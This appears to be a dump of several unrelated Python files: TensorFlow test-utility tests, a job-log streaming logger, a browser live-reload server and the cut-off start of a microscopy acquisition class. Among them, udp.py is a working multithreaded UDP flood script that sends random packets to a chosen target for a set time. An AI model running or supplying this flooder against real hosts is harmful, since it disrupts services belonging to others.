raise errors.UnauthenticatedError(node_def, op, "true_err")
@test_util.run_in_graph_and_eager_modes
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
@test_util.run_in_graph_and_eager_modes
def testAllCloseTensors(self):
a_raw_data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a = constant_op.constant(a_raw_data)
b = math_ops.add(1, constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8]]))
self.assertAllClose(a, b)
self.assertAllClose(a, a_raw_data)
a_dict = {"key": a}
b_dict = {"key": b}
self.assertAllClose(a_dict, b_dict)
x_list = [a, b]
y_list = [a_raw_data, b]
self.assertAllClose(x_list, y_list)
@test_util.run_in_graph_and_eager_modes
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegex(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 7 + 1e-5)
@test_util.run_in_graph_and_eager_modes
def testAllCloseList(self):
with self.assertRaisesRegex(AssertionError, r"not close dif"):
self.assertAllClose([0], [1])
@test_util.run_in_graph_and_eager_modes
def testAllCloseDictToNonDict(self):
with self.assertRaisesRegex(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose(1, {"a": 1})
with self.assertRaisesRegex(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose({"a": 1}, 1)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNamedtuples(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
my_named_tuple = collections.namedtuple("MyNamedTuple", ["a", "b", "c"])
# Identity.
self.assertAllClose(expected, my_named_tuple(a=a, b=b, c=c))
self.assertAllClose(
my_named_tuple(a=a, b=b, c=c), my_named_tuple(a=a, b=b, c=c))
@test_util.run_in_graph_and_eager_modes
def testAllCloseDicts(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
# Identity.
self.assertAllClose(expected, expected)
self.assertAllClose(expected, dict(expected))
# With each item removed.
for k in expected:
actual = dict(expected)
del actual[k]
with self.assertRaisesRegex(AssertionError, r"mismatched keys"):
self.assertAllClose(expected, actual)
# With each item changed.
with self.assertRaisesRegex(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a + 1e-5, "b": b, "c": c})
with self.assertRaisesRegex(AssertionError, r"Shape mismatch"):
self.assertAllClose(expected, {"a": a, "b": b + (4.,), "c": c})
c_copy = np.array(c)
c_copy[1, 1, 1] += 1e-5
with self.assertRaisesRegex(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a, "b": b, "c": c_copy})
@test_util.run_in_graph_and_eager_modes
def testAllCloseListOfNamedtuples(self):
my_named_tuple = collections.namedtuple("MyNamedTuple", ["x", "y"])
l1 = [
my_named_tuple(x=np.array([[2.3, 2.5]]), y=np.array([[0.97, 0.96]])),
my_named_tuple(x=np.array([[3.3, 3.5]]), y=np.array([[0.98, 0.99]]))
]
l2 = [
([[2.3, 2.5]], [[0.97, 0.96]]),
([[3.3, 3.5]], [[0.98, 0.99]]),
]
self.assertAllClose(l1, l2)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNestedStructure(self):
a = {"x": np.ones((3, 2, 4)) * 7, "y": (2, [{"nested": {"m": 3, "n": 4}}])}
self.assertAllClose(a, a)
b = copy.deepcopy(a)
self.assertAllClose(a, b)
# Test mismatched values
b["y"][1][0]["nested"]["n"] = 4.2
with self.assertRaisesRegex(AssertionError,
r"\[y\]\[1\]\[0\]\[nested\]\[n\]"):
self.assertAllClose(a, b)
@test_util.run_in_graph_and_eager_modes
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
@test_util.skip_if(True) # b/117665998
def testForceGPU(self):
with self.assertRaises(errors.InvalidArgumentError):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
@test_util.run_in_graph_and_eager_modes
def testAssertAllCloseAccordingToType(self):
# test plain int
self.assertAllCloseAccordingToType(1, 1, rtol=1e-8, atol=1e-8)
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-8], dtype=dtypes.float64),
constant_op.constant([2e-8], dtype=dtypes.float64),
rtol=1e-8,
atol=1e-8)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-7], dtype=dtypes.float32),
constant_op.constant([2e-7], dtype=dtypes.float32),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-4], dtype=dtypes.float16),
constant_op.constant([2e-4], dtype=dtypes.float16),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7,
half_rtol=1e-4,
half_atol=1e-4)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
@test_util.run_in_graph_and_eager_modes
def testAssertAllEqual(self):
i = variables.Variable([100] * 3, dtype=dtypes.int32, name="i")
j = constant_op.constant([20] * 3, dtype=dtypes.int32, name="j")
k = math_ops.add(i, j, name="k")
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual([100] * 3, i)
self.assertAllEqual([120] * 3, k)
self.assertAllEqual([20] * 3, j)
with self.assertRaisesRegex(AssertionError, r"not equal lhs"):
self.assertAllEqual([0] * 3, k)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllEqual(self):
i = variables.Variable([100], dtype=dtypes.int32, name="i")
j = constant_op.constant([20], dtype=dtypes.int32, name="j")
k = math_ops.add(i, j, name="k")
self.evaluate(variables.global_variables_initializer())
self.assertNotAllEqual([100] * 3, i)
self.assertNotAllEqual([120] * 3, k)
self.assertNotAllEqual([20] * 3, j)
with self.assertRaisesRegex(
AssertionError, r"two values are equal at all elements.*extra message"):
self.assertNotAllEqual([120], k, msg="extra message")
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllClose(self):
# Test with arrays
self.assertNotAllClose([0.1], [0.2])
with self.assertRaises(AssertionError):
self.assertNotAllClose([-1.0, 2.0], [-1.0, 2.0])
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
self.assertNotAllClose([0.9, 1.0], x)
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.0, 1.0], x)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseRTol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], rtol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, rtol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseATol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], atol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, atol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLess(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllClose([110.0, 120.0, 130.0], z)
self.assertAllGreater(x, 95.0)
self.assertAllLess(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 95.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLessEqual(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllEqual([110.0, 120.0, 130.0], z)
self.assertAllGreaterEqual(x, 95.0)
self.assertAllLessEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 95.0)
def testAssertAllInRangeWithNonNumericValuesFails(self):
s1 = constant_op.constant("Hello, ", name="s1")
c = constant_op.constant([1 + 2j, -3 + 5j], name="c")
b = constant_op.constant([False, True], name="b")
with self.assertRaises(AssertionError):
self.assertAllInRange(s1, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(c, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(b, 0, 1)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRange(self):
x = constant_op.constant([10.0, 15.0], name="x")
self.assertAllInRange(x, 10, 15)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_lower_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_upper_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(
x, 10, 15, open_lower_bound=True, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeErrorMessageEllipses(self):
x_init = np.array([[10.0, 15.0]] * 12)
x = constant_op.constant(x_init, name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 5, 10)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeDetectsNaNs(self):
x = constant_op.constant(
[[np.nan, 0.0], [np.nan, np.inf], [np.inf, np.nan]], name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 0.0, 2.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeWithInfinities(self):
x = constant_op.constant([10.0, np.inf], name="x")
self.assertAllInRange(x, 10, np.inf)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, np.inf, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInSet(self):
b = constant_op.constant([True, False], name="b")
x = constant_op.constant([13, 37], name="x")
self.assertAllInSet(b, [False, True])
self.assertAllInSet(b, (False, True))
self.assertAllInSet(b, {False, True})
self.assertAllInSet(x, [0, 13, 37, 42])
self.assertAllInSet(x, (0, 13, 37, 42))
self.assertAllInSet(x, {0, 13, 37, 42})
with self.assertRaises(AssertionError):
self.assertAllInSet(b, [False])
with self.assertRaises(AssertionError):
self.assertAllInSet(x, (42,))
def testRandomSeed(self):
# Call setUp again for WithCApi case (since it makes a new default graph
# after setup).
# TODO(skyewm): remove this when C API is permanently enabled.
with context.eager_mode():
self.setUp()
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
a_rand = random_ops.random_normal([1])
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
b_rand = random_ops.random_normal([1])
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertAllEqual(a_rand, b_rand)
@test_util.run_in_graph_and_eager_modes
def test_callable_evaluate(self):
def model():
return resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=1) + 1
with context.eager_mode():
self.assertEqual(2, self.evaluate(model))
@test_util.run_in_graph_and_eager_modes
def test_nested_tensors_evaluate(self):
expected = {"a": 1, "b": 2, "nested": {"d": 3, "e": 4}}
nested = {"a": constant_op.constant(1),
"b": constant_op.constant(2),
"nested": {"d": constant_op.constant(3),
"e": constant_op.constant(4)}}
self.assertEqual(expected, self.evaluate(nested))
def test_run_in_graph_and_eager_modes(self):
l = []
def inc(self, with_brackets):
del self # self argument is required by run_in_graph_and_eager_modes.
mode = "eager" if context.executing_eagerly() else "graph"
with_brackets = "with_brackets" if with_brackets else "without_brackets"
l.append((with_brackets, mode))
f = test_util.run_in_graph_and_eager_modes(inc)
f(self, with_brackets=False)
f = test_util.run_in_graph_and_eager_modes()(inc)
f(self, with_brackets=True)
self.assertEqual(len(l), 4)
self.assertEqual(set(l), {
("with_brackets", "graph"),
("with_brackets", "eager"),
("without_brackets", "graph"),
("without_brackets", "eager"),
})
def test_get_node_def_from_graph(self):
graph_def = graph_pb2.GraphDef()
node_foo = graph_def.node.add()
node_foo.name = "foo"
self.assertIs(test_util.get_node_def_from_graph("foo", graph_def), node_foo)
self.assertIsNone(test_util.get_node_def_from_graph("bar", graph_def))
def test_run_in_eager_and_graph_modes_test_class(self):
msg = "`run_in_graph_and_eager_modes` only supports test methods.*"
with self.assertRaisesRegex(ValueError, msg):
@test_util.run_in_graph_and_eager_modes()
class Foo(object):
pass
del Foo # Make pylint unused happy.
def test_run_in_eager_and_graph_modes_skip_graph_runs_eager(self):
modes = []
def _test(self):
if not context.executing_eagerly():
self.skipTest("Skipping in graph mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["eager"])
def test_run_in_eager_and_graph_modes_skip_eager_runs_graph(self):
modes = []
def _test(self):
if context.executing_eagerly():
self.skipTest("Skipping in eager mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["graph"])
def test_run_in_graph_and_eager_modes_setup_in_same_mode(self):
modes = []
mode_name = lambda: "eager" if context.executing_eagerly() else "graph"
class ExampleTest(test_util.TensorFlowTestCase):
def runTest(self):
pass
def setUp(self):
modes.append("setup_" + mode_name())
@test_util.run_in_graph_and_eager_modes
def testBody(self):
modes.append("run_" + mode_name())
e = ExampleTest()
e.setUp()
e.testBody()
self.assertEqual(modes[1:2], ["run_graph"])
self.assertEqual(modes[2:], ["setup_eager", "run_eager"])
@parameterized.named_parameters(dict(testcase_name="argument",
arg=True))
@test_util.run_in_graph_and_eager_modes
def test_run_in_graph_and_eager_works_with_parameterized_keyword(self, arg):
self.assertEqual(arg, True)
@combinations.generate(combinations.combine(arg=True))
@test_util.run_in_graph_and_eager_modes
def test_run_in_graph_and_eager_works_with_combinations(self, arg):
self.assertEqual(arg, True)
def test_build_as_function_and_v1_graph(self):
class GraphModeAndFunctionTest(parameterized.TestCase):
def __init__(inner_self): # pylint: disable=no-self-argument
super(GraphModeAndFunctionTest, inner_self).__init__()
inner_self.graph_mode_tested = False
inner_self.inside_function_tested = False
def runTest(self):
del self
@test_util.build_as_function_and_v1_graph
def test_modes(inner_self): # pylint: disable=no-self-argument
if ops.inside_function():
self.assertFalse(inner_self.inside_function_tested)
inner_self.inside_function_tested = True
else:
self.assertFalse(inner_self.graph_mode_tested)
inner_self.graph_mode_tested = True
test_object = GraphModeAndFunctionTest()
test_object.test_modes_v1_graph()
test_object.test_modes_function()
self.assertTrue(test_object.graph_mode_tested)
self.assertTrue(test_object.inside_function_tested)
def test_with_forward_compatibility_horizons(self):
tested_codepaths = set()
def some_function_with_forward_compat_behavior():
if compat.forward_compatible(2050, 1, 1):
tested_codepaths.add("future")
else:
tested_codepaths.add("present")
@test_util.with_forward_compatibility_horizons(None, [2051, 1, 1])
def some_test(self):
del self # unused
some_function_with_forward_compat_behavior()
some_test(None)
self.assertEqual(tested_codepaths, set(["present", "future"]))
class SkipTestTest(test_util.TensorFlowTestCase):
def _verify_test_in_set_up_or_tear_down(self):
with self.assertRaises(unittest.SkipTest):
with test_util.skip_if_error(self, ValueError,
["foo bar", "test message"]):
raise ValueError("test message")
try:
with self.assertRaisesRegex(ValueError, "foo bar"):
with test_util.skip_if_error(self, ValueError, "test message"):
raise ValueError("foo bar")
except unittest.SkipTest:
raise RuntimeError("Test is not supposed to skip.")
def setUp(self):
super(SkipTestTest, self).setUp()
self._verify_test_in_set_up_or_tear_down()
def tearDown(self):
super(SkipTestTest, self).tearDown()
self._verify_test_in_set_up_or_tear_down()
def test_skip_if_error_should_skip(self):
with self.assertRaises(unittest.SkipTest):
with test_util.skip_if_error(self, ValueError, "test message"):
raise ValueError("test message")
def test_skip_if_error_should_skip_with_list(self):
with self.assertRaises(unittest.SkipTest):
with test_util.skip_if_error(self, ValueError,
["foo bar", "test message"]):
raise ValueError("test message")
def test_skip_if_error_should_skip_without_expected_message(self):
with self.assertRaises(unittest.SkipTest):
with test_util.skip_if_error(self, ValueError):
raise ValueError("test message")
def test_skip_if_error_should_skip_without_error_message(self):
with self.assertRaises(unittest.SkipTest):
with test_util.skip_if_error(self, ValueError):
raise ValueError()
def test_skip_if_error_should_raise_message_mismatch(self):
try:
with self.assertRaisesRegex(ValueError, "foo bar"):
with test_util.skip_if_error(self, ValueError, "test message"):
raise ValueError("foo bar")
except unittest.SkipTest:
raise RuntimeError("Test is not supposed to skip.")
def test_skip_if_error_should_raise_no_message(self):
try:
with self.assertRaisesRegex(ValueError, ""):
with test_util.skip_if_error(self, ValueError, "test message"):
raise ValueError()
except unittest.SkipTest:
raise RuntimeError("Test is not supposed to skip.")
# Its own test case to reproduce variable sharing issues which only pop up when
# setUp() is overridden and super() is not called.
class GraphAndEagerNoVariableSharing(test_util.TensorFlowTestCase):
def setUp(self):
pass # Intentionally does not call TensorFlowTestCase's super()
@test_util.run_in_graph_and_eager_modes
def test_no_variable_sharing(self):
variable_scope.get_variable(
name="step_size",
initializer=np.array(1e-5, np.float32),
use_resource=True,
trainable=False)
class GarbageCollectionTest(test_util.TensorFlowTestCase):
def test_no_reference_cycle_decorator(self):
class ReferenceCycleTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_garbage_created
def test_has_cycle(self):
a = []
a.append(a)
@test_util.assert_no_garbage_created
def test_has_no_cycle(self):
pass
with self.assertRaises(AssertionError):
ReferenceCycleTest().test_has_cycle()
ReferenceCycleTest().test_has_no_cycle()
@test_util.run_in_graph_and_eager_modes
def test_no_leaked_tensor_decorator(self):
class LeakedTensorTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_new_tensors
def test_has_leak(self):
self.a = constant_op.constant([3.], name="leak")
@test_util.assert_no_new_tensors
def test_has_no_leak(self):
constant_op.constant([3.], name="no-leak")
with self.assertRaisesRegex(AssertionError, "Tensors not deallocated"):
LeakedTensorTest().test_has_leak()
LeakedTensorTest().test_has_no_leak()
def test_no_new_objects_decorator(self):
class LeakedObjectTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
inner_self.accumulation = []
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_leak(self):
self.accumulation.append([1.])
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_no_leak(self):
self.not_accumulating = [1.]
with self.assertRaises(AssertionError):
LeakedObjectTest().test_has_leak()
LeakedObjectTest().test_has_no_leak()
class RunFunctionsEagerlyInV2Test(test_util.TensorFlowTestCase,
parameterized.TestCase):
@parameterized.named_parameters(
[("_RunEagerly", True), ("_RunGraph", False)])
def test_run_functions_eagerly(self, run_eagerly): # pylint: disable=g-wrong-blank-lines
results = []
@def_function.function
def add_two(x):
for _ in range(5):
x += 2
results.append(x)
return x
with test_util.run_functions_eagerly(run_eagerly):
add_two(constant_op.constant(2.))
if context.executing_eagerly():
if run_eagerly:
self.assertTrue(isinstance(t, ops.EagerTensor) for t in results)
else:
self.assertTrue(isinstance(t, ops.Tensor) for t in results)
else:
self.assertTrue(isinstance(t, ops.Tensor) for t in results)
if __name__ == "__main__":
googletest.main()
|
logger.py
|
from __future__ import absolute_import
import sys
import traceback
import six
from threading import Timer, Thread, Lock
from aetros.utils import thread_join_non_blocking
def drain_stream(stream, decode='utf-8'):
content = six.b('')
while True:
try:
# read() needs to block
# buf = os.read(buffer.fileno(), 4096)
buf = stream.read(1024)
if buf == six.b(''):
break
content += buf
except Exception:
break
if decode:
return content.decode(decode)
return content
class GeneralLogger(object):
def __init__(self, redirect_to, job_backend=None):
self.job_backend = job_backend
self.buffer = ''
self.last_timer = None
self.last_messages = ''
self.logger = redirect_to or sys.__stdout__
self.lock = Lock()
self.attach_last_messages = {}
self.buffer_disabled = False
def disable_buffer(self):
self.buffer_disabled = True
self.buffer = ''
def clear_buffer(self):
self.buffer = ''
def fileno(self):
return self.logger.fileno()
def isatty(self):
return self.logger.isatty()
def flush(self):
self.logger.flush()
self.send_buffer()
def send_buffer(self):
self.last_timer = None
if self.buffer:
if self.job_backend:
if self.job_backend.write_log(self.buffer):
self.buffer = ''
def attach(self, buffer, read_line=None):
"""
Read buffer until end (read() returns '') and sends it to self.logger and self.job_backend.
:param buffer: a buffer instance with block read() or readline() method
:param read_line: callable or True to read line per line. If callable is given, it will be executed per line
and ignores does not redirect the line to stdout/logger when callable returns False.
"""
bid = id(buffer)
self.attach_last_messages[bid] = b''
def reader():
current_line = b''
def handle_line(buf):
if chunk == b'':
return
if read_line and callable(read_line):
res = read_line(buf)
if res is False:
return False
elif res is not None:
buf = res
if hasattr(buf, 'encode'):
buf = buf.encode('utf-8')
self.attach_last_messages[bid] += buf
if len(self.attach_last_messages[bid]) > 21 * 1024:
self.attach_last_messages[bid] = self.attach_last_messages[bid][-20 * 1024:]
self.write(buf)
flush_char = b'\n'
while True:
try:
# needs to be 1 so we fetch data in near real-time
chunk = buffer.read(1)
if chunk == b'':
if current_line:
handle_line(current_line)
return
current_line += chunk
while flush_char in current_line:
pos = current_line.find(flush_char)
line = current_line[:pos+1]
current_line = current_line[pos+1:]
handle_line(line)
# todo, periodically flush by '\r' only (progress bars for example)
# and make sure only necessary data is sent (by applying \r and \b control characters)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
# we need to make sure, we continue to read otherwise the process of this buffer
# will block and we have a stuck process.
sys.__stderr__.write(traceback.format_exc() + '\n')
sys.__stderr__.flush()
thread = Thread(target=reader)
thread.daemon = True
thread.start()
def wait():
thread_join_non_blocking(thread)
self.send_buffer()
return wait
def write(self, message):
try:
self.lock.acquire()
if b'' == message:
return
if hasattr(message, 'decode'):
# don't decode string again
# necessary for Python3
message = message.decode('utf-8', errors='replace')
self.logger.write(message)
self.logger.flush()
self.last_messages += message
if len(self.last_messages) > 20 * 1024:
self.last_messages = self.last_messages[-20 * 1024:]
if not self.buffer_disabled:
for char in message:
if '\b' == char and self.buffer:
self.buffer = self.buffer[:-1]
else:
self.buffer += char
if not self.last_timer:
self.last_timer = Timer(1.0, self.send_buffer)
self.last_timer.start()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
sys.__stderr__.write(traceback.format_exc() + '\n')
sys.__stderr__.flush()
finally:
if self.lock.locked():
self.lock.release()
|
udp.py
|
#!/usr/bin/env python3
import random
import time
import socket
from threading import Thread
def UDP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting UDP attack...")
threads_list = []
# UDP flood
def udp_flood():
global FINISH
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
if FINISH:
break
# Send random payload
try:
for _ in range(16):
payload = random._urandom(random.randint(1, 60))
sock.sendto(payload, (target_ip, target_port))
except Exception as e:
print(e)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" UDP packet with size " + str(len(payload)) + " was sent!")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread)+ "...")
t = Thread(target = udp_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
reloader.py
|
import os
from time import sleep
import helium
from threading import Thread
import re
from stellapy.logger import log
from stellapy.walker import walk, get_file_content
from stellapy.executor import Executor
from stellapy.configuration import Configuration
class Reloader:
"""
The `Reloader` class.
"""
def __init__(self, command: str, url: str) -> None:
self.project_data = self.get_project_data()
self.command = command
self.ex = Executor(self.command)
self.url = url
c = Configuration()
self.config = c.load_configuration()
@staticmethod
def get_project_data() -> dict:
"""
Returns a dict with filenames mapped to their contents.
"""
project_data = {}
for f in walk():
project_data.update({f: get_file_content(f)})
return project_data
def detect_change(self) -> bool:
"""
Detects if a change has been done to the project. Also updates the project data if
new a change is detected.
"""
new_content = self.get_project_data()
if len(self.project_data.keys()) != len(new_content.keys()):
self.project_data = new_content
return True
try:
for k, v in self.project_data.items():
if new_content[k] != v:
self.project_data = new_content
return True
except KeyError:
self.project_data = new_content
return True
except Exception as e:
print("FATAL ERROR: This should never happen.")
print(e)
quit(1)
return False
def start_browser(self):
browser = self.config["browser"]
if browser == "chrome":
try:
helium.start_chrome(self.url)
except Exception as e:
if "Message: unknown error: cannot find Chrome binary" in str(e):
log(
"error",
"chrome binary not found. either install chrome browser or configure stella browser to firefox.",
)
self.stop_server()
elif "Reached error page" in str(e):
log("error", "app crashed, waiting for file changes to restart...")
else:
log("error", f"an unknown error occurred: \n{e}")
self.stop_server()
elif browser == "firefox":
try:
helium.start_firefox(self.url)
except Exception as e:
if "Message: unknown error: cannot find Firefox binary" in str(e):
log(
"error",
"firefox binary not found. either install chrome browser or configure stella browser to firefox.",
)
self.stop_server()
elif "Message: Reached error page" in str(e):
log("error", "app crashed, waiting for file changes to restart...")
else:
log("error", f"an unknown error occurred: \n{e}")
self.stop_server()
else:
log(
"error",
f"invalid browser specified: {browser}. stella supports only chrome and firefox. execute `stella config --browser chrome|firefox` for configuring the browser.",
)
self.stop_server()
def _restart(self):
try:
if self.detect_change():
log(
"info",
"detected changes in the project, reloading server and browser",
)
self.ex.re_execute()
sleep(1)
helium.refresh()
else:
sleep(1)
except Exception:
try:
log("error", "browser reload didnt work, retrying in 5 seconds...")
sleep(5)
helium.refresh()
except Exception:
log(
"error",
"browser reload retry failed! make sure you've provided stella the correct url to listen at. waiting for file changes to restart...",
)
def restart(self) -> None:
self.start_browser()
while True:
self._restart()
def manual_input(self) -> None:
"""
Manual restart and exit.
"""
while True:
message = input().lower().strip()
if message == "ex":
log("info", "stopping server")
self.stop_server()
elif message == "rs":
log("info", "restarting the server")
try:
self.ex.re_execute()
sleep(1)
helium.refresh()
except Exception:
try:
log(
"error",
"browser reload didnt work, retrying in 5 seconds...",
)
sleep(5)
helium.refresh()
except Exception:
log(
"error",
"browser reload retry failed! make sure you've provided stella the correct url to listen at. waiting for file changes to restart...",
)
def stop_server(self):
try:
self.ex.close()
helium.kill_browser()
except Exception as e:
log(
"error",
"an error occured while stopping the server, this should never happen.",
)
print(e)
finally:
os._exit(0)
def start_server(self) -> None:
"""
Starts the server. All reloading and stuff is done here.
"""
log("stella", "starting stella")
log(
"stella",
f"executing `{self.command}` and listening at {self.url} on the browser",
)
log(
"stella",
"input `rs` to manually restart the server and `ex` to stop the server",
)
input_thread = Thread(target=self.manual_input)
input_thread.start()
self.ex.start()
self.restart()
|
rt_acquisition.py
|
#acquisition stuff
from pycromanager import Acquisition, Bridge
from skimage import io
import cv2 as cv
import json
import time
import os
import numpy as np
from multiprocessing import Process, Queue, Value
import acquisitionDialog
from utils.barcode_code import find_barcode_region, match_barcode
class run_acquisition:
"""
running acqusition using pycromanager as with real-time segmentation
input: events - list of events as defined in pycromanager documentation
TODO-update documentation
TODO-error handling
TODO-connect segmentation and non-segmentation version together with segmentation and barcode flags
TODO-add 'on-the-fly' stabilization
TODO-change the metadata name from phase to 'segmentation' for segmented image
TODO-add compression for saving of images
Kuba
"""
def __init__(self, events = None, save_path = '', q = None, model_path = ''):
self.events = events
self.tot_images = len(events)
self.save_path = save_path
self.model_path = model_path
#initialise shared values
self.check_abort = Value('b',False) # <- shared between processes
self.check_segmentation_completed = Value('b',False)
#initialise shared queue
self.q = Queue()
#initialise event counter
self.counter = 0
#initialise barcode image dictionary - populate the dictionary with None
